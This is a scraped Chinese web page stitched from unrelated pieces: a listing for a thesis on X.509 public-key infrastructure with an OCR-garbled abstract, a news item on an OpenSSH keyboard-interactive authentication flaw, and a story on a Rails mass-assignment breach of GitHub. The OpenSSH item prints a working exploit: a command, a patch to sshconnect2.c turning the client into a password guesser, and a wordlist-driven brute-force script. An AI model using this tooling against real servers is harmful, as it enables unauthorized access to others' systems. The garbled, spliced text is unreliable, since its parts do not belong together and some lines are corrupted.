您所在位置： &
&nbsp&&nbsp&nbsp&&nbsp
基于X.509标准的公共密钥基础设施工作原理探讨和简单证书功能模块实现.pdf 59页
本文档一共被下载：
次 ,您可全文免费在线阅读后下载本文档。
下载提示
1.本站不保证该用户上传的文档完整性，不预览、不比对内容而直接下载产生的反悔问题本站不予受理。
2.该文档所得收入(下载+内容+预览三)归上传者、原创者。
3.登录后可充值，立即自动返金币，充值渠道很便利
你可能关注的文档：
··········
··········
基于x．509标准的公共密钥基础设旋工作原理探讨及简单证书
功能模块实现
Discussiononthe
Principles
Operational
Certificate
ImplementationElementary
笪理科堂皇王程
作学学研导 师及职 名型业向称
割!坠担 熬援
基于X．509标准的公共密钥基础设施工作原理探讨及简单证书
功能模块实现
密钥是一切密码系统安全性的来源与命脉，密钥管理则在密码系统中起到
了根本性的作用。良好的密钥管理机制将大大降低对整个密码系统的管理难度，
有效地提高密码系统的安全性_jfⅡ可管理性并且显著降低信息安全总成本。但是
计算机网络的出现与飞速发展给密钥管理工作带来了巨大的困难和挑战，密钥
管理工作的背景和环境进入了存在成千上万不同类型通讯实体的、崭新的网络
世界之中。在诸多密钥管理解决方案之中，基于“可信第三方”思想和非对称
密钥密码学体系的公共密钥基础设施凭借其自身的多种优势和特点，有效地解
决了诸多的网络安全性问题，成为当今网络环境下最重要，也是应用最为广泛
的一个密钥管理解决方案，同时也成为了该领域的研究热点。
本文在绪论中首先介绍了本文研究工作的相关背景一一网络环境下的密钥
管理所面临的困境，简要分析了其中存在的若干问题及解决思路，最后给出了
对公共密钥基础设施的发展简介及其国内外研究现状。在绪论之后介绍了一些
有关密码学与信息安全的必要基础知识和基本概念，接着详细地分析和探讨了
公共密钥基础设施的设计思想、组织结构和工作原理，明确地阐述了公共密钥
基础设施提供了怎样的安全性服务，解决了什么样的信息安全问题。在最后的
命名规则以及x．509国际标准证书格式)，然后结合前文的讨论与分析详细阐述
并使用跨平台高级程序设计语言Java作为实现语言。
本文在通过较全面地收集各种相关资料的基础上，经过详细讨论和综合分
析，旨在给出公共密钥基础设施的一个完整的体系，阐明了公共密钥基础设施
能够解决什么安全性问题、满足什么安全性要求，涉及了公共密钥密码体系环
境下密钥管理的核心问题。在实践阶段中使用面向对像的可移植高级语言一一
准格式的数字证书在高级语言环境下的数据结构描述问题以及证书功能模块的
可移植性问题，在标准化、跨平台、可移植的证书功能模块的实现工作中作了
有意义的初步探索。
关键词：公共密钥基础设施数字证书认证中心注册中心
DiSCUSSiononthe
Operational
Principles
Implementation
Elementary
FunctionModule
istheheartandcoreofatl
正在加载中，请稍后...利用安全远程访问工具OpenSSH中的一个漏洞，攻击者可绕过认证重试次数的限制，进行大量的口令猜解。一位网名为Kingcope的安全人员近日在博客上发布了这个漏洞的利用方法。
OpenSSH服务器的“键盘交互”认证是打开的，默认设置为允许6次认证尝试，客户端只允许3次，然后就会关闭与服务器的连接。然而，这个认证机制可以在单次连接中进行多次认证尝试。利用这个漏洞，攻击者能够在允许登录时间的2分钟内进行多次口令尝试，也就意味着成千上万次的暴力破解。
而且，即使在OpenSSH的配置中把口令认证设置成“no”并使用公共密钥认证也无法防止这种攻击。
漏洞利用方法：
ssh -lusername -oKbdInteractiveDevices=`perl -e ‘print “pam,” x 1;` targethost
这条命令可以在登录时间尝试多达10000个口令。下面是openssh-6.9p1的攻击补丁，打上这个补丁之后即可执行远程破解：
—分割线–
diff openssh-6.9p1/sshconnect2.c openssh-6.9p1-modified/sshconnect2.c
& char password[1024];
510c512,517
& authctxt-&success = 1; /* break out */
& printf(“==============================================\n”);
& printf(“*** SUCCESS **********************************\n”);
& printf(“*** PASSWORD: %s\n”, password);
& printf(“==============================================\n”);
& exit(0);
& devicebuffer = calloc(1, 200000);
& if (!devicebuffer) {
& fatal(“cannot allocate devicebuffer”);
& for (i=0;i&;i+=2) {
& memcpy(devicebuffer + i, “p,”, 2);
& devicebuffer[200000] = 0;
& packet_put_cstring(options.kbd_interactive_devices ?
& options.kbd_interactive_devices : “”);
& packet_put_cstring(devicebuffer);
& char *name, *inst, *lang, *prompt, *
& char *name, *inst, *lang, *
& int echo = 0;
& echo = packet_get_char();
& response = read_passphrase(prompt, echo ? RP_ECHO : 0);
& packet_put_cstring(response);
& explicit_bzero(response, strlen(response));
& free(response);
& packet_get_char();
& if (fgets(password, 1024, stdin) == NULL)
& exit(0);
& if ((pos=strchr(password, ‘\n’)) != NULL)
& *pos = ”;
& printf(“%s\n”, password);
& packet_put_cstring(password);
—分割线—
补丁打上之后，即可使用下面的shell脚本挂上词汇表进行口令破解的尝试：
—分割线—
#!/bin/bash
# cat wordlist.txt | ./sshcracker.sh ssh-username ssh-target
while true
./ssh -l$1 $2
rc=$?; if [[ $rc == 0 ]]; then exit $ fi
echo Respawn due to login grace time…
—分割线—
cat wordlist.txt | ./sshcracker.sh test 192.168.2.173
该攻击已经在FreeBSD 10.1系统及老版本如6.2上成功测试。软件与服务//
用户攻击GitHub展示被忽视的漏洞
　　Ruby on Rails，通常被简称为Rails，是Ruby编程语言中越来越流行的一种Web应用开发架构，其目标是让程序员把重心放在应用创建上而不是仅仅了解后台所发生的事情。
　　使用最广泛的Rails Web服务时GitHub。这是一个大型代码托管和协作型开发平台，该平台还托管了Ruby on Rails项目的官方代码存储库和漏洞追踪器。
　　上周四，一位名叫Egor Homakov的俄罗斯用户报告了一个漏洞，黑客可利用此漏洞从Web表单将未验证数据插入Rails应用数据库，就像是SQL注入一样。
　　这一安全问题源于一个名为mass assignment的Rails特性，如果有安全隐患的话，那么此特性可能被滥用。虽然几年前就被告知此特性有被滥用的可能性，但是Rails开发团队认为应由应用程序员来限制哪项属性可被更改。
　　该问题的实质就是Rails程序员是否该将此性能列入黑名单或白名单;他们是否应该允许所有属性被默认修改，并期望程序员将比较敏感的项目列入黑名单呢?或者他们应该默认拦截所有属性，在经过安全方面的权衡后，再让程序员启用他们需要的属性。
　　遗憾的是，过去的经验告诉我们把安全问题的权衡交给用户通常不是个好主意，因为这会导致用户安装大量不安全的应用，Homakov称这是过去几年里Rails mass assignment所导致的结果。
　　在未能说服Rails团队的情况下，Homakov决定亲自做演示，以证明该漏洞不仅存在于GitHub中，从而令Rails团队强制部署必要的限制。
　　上周日，Homakov利用GitHub上的这个漏洞在Ruby on Rails漏洞追踪器上创建一个模糊输入。他替换了一名程序员进入GitHub数据库的公共密钥后获取了进入官方Rails代码存储库的权限。
　　上周日，GitHub程序员Tom Preston Werner在自己的博客中写道：“上午8:49，一名GitHub用户利用公共密钥更新表单中的漏洞将自己的公共密钥添加到了rails中，于是他可以将新文件推入该项目中，作为证明此漏洞存在的演示。”
　　GitHub用不到一小时的时间修复了该漏洞，并暂时停用了Homakov的账号以作调查。如果GitHub团队证明其意图并非恶意，晚些时候会恢复其账号的使用。
　　“在对此次攻击展开调查的同时，我们也对GitHub代码库展开了一次全面审核，以确保不会再出现类似的漏洞，”Preston-Werner说。“此次审核仍在继续，我本人也要确保我们能有一种长期性的策略防止此类漏洞重演。”
　　这次事件吸引了众多目光，Rails程序员现在也比以前更愿意就此问题进行讨论并找到相应的解决方案。尽管如此，这个漏洞已经获得广泛的关注度，而针对不安全Rails应用的攻击威胁也增加了。
关键词：漏洞补丁,用户攻击,漏洞
责任编辑：白志飞
All Rights Reserved, Copyright , Ctocio.com.cn
如有意见请与我们联系 powered by 天极内容管理平台CMS4i
京公网安备84号安全检查中...
请打开浏览器的javascript，然后刷新浏览器
soft6.com 浏览器安全检查中...
还剩 5 秒&Windows 婕忔礊鍏?憡銆恘s152鍚с}